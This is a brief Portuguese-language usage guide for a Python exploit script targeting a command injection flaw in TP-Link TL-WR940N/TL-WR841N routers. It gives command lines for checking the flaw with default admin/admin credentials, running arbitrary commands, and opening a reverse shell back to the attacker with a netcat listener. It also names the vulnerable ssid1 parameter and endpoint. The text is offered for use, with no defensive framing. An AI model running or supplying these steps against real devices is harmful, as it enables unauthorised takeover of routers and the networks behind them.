
Exploit em Python para a Vulnerabilidade de Injeção de Comandos em TP-Link TL-WR940N/TL-WR841N
Verificação Básica de Vulnerabilidade:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
Executar Comando Personalizado:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
Reverse Shell (configure o listener primeiro com nc -lvnp 4444):
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
Notas Importantes:
A vulnerabilidade existe devido à sanitização inadequada da entrada no parâmetro ssid1 do endpoint /userRpm/WlanNetworkRpm.htm, permitindo injeção de comandos através de requisições especialmente criadas.